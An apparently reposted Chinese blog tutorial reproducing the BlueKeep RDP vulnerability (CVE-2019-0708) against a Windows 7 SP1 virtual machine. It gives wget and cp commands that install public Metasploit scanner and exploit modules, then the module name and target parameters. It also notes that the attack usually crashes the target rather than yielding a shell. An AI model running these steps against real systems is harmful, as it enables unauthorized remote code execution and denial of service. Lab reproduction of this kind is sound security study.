CVE-2019-0708 遠程桌面代碼執行漏洞復現


0x01

首先是靶機,這里的靶機是使用清水表哥提供的win7sp1的系統

漏洞環境
使用VM安裝Windows7 SP1模擬受害機
Windows7 SP1下載鏈接:
ed2k://|file|cn_windows_7_ultimate_with_sp1_x64_dvd_u_677408.iso|3420557312|B58548681854236C7939003B583A8078|/

如果用上面的系統,vm虛擬機安裝的時候默認是家庭版的,所以在安裝的時候要選擇一下。
blob

安裝好如下:

blob

0708漏洞利用方式是通過遠程桌面端口3389,RDP協議進行攻擊的。所以3389端口當然要打開啦。

blob

靶機工作完成。


0x02

攻擊機我這里用的是kali里面的msf,而且msf我以前有卸載了重新安裝過。
所以我先看看我msf安裝的路徑在哪里。

find / -name 'metasploit'

blob

我的路徑是安裝在/opt目錄下。

首先,我們需要下載好攻擊套件放置文件到msf的相應文件夾(如果已存在同名文件,直接覆蓋即可)

wget https://raw.githubusercontent.com/rapid7/metasploit-framework/edb7e20221e2088497d1f61132db3a56f81b8ce9/lib/msf/core/exploit/rdp.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/rdp_scanner.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

wget https://github.com/rapid7/metasploit-framework/raw/edb7e20221e2088497d1f61132db3a56f81b8ce9/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb

blob

下載下來后,直接復制到對應的路徑。

cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/

cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/

如果這里沒有rdp目錄,就用mkdir命令創建一個rdp目錄
cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/rdp/

cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/

blob

這時啟動msf。

blob

更新一下msf

blob

更新以后使用reload_all重新加載0708rdp利用模塊

blob

use exploit/rdp/cve_2019_0708_bluekeep_rce

blob

主要設置的參數有RHOSTS / RPORT / target
* RHOSTS 靶機ip
* RPORT rdp端口
* target ID數字(可選為0-4)設置受害機機器架構

0x03

攻擊成功如下圖

blob

但這是要看運氣的,十次里面可能有一兩次才會反彈shell,大部分只會造成藍屏。

 

參考連接:http://www.nmd5.com/?p=409

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM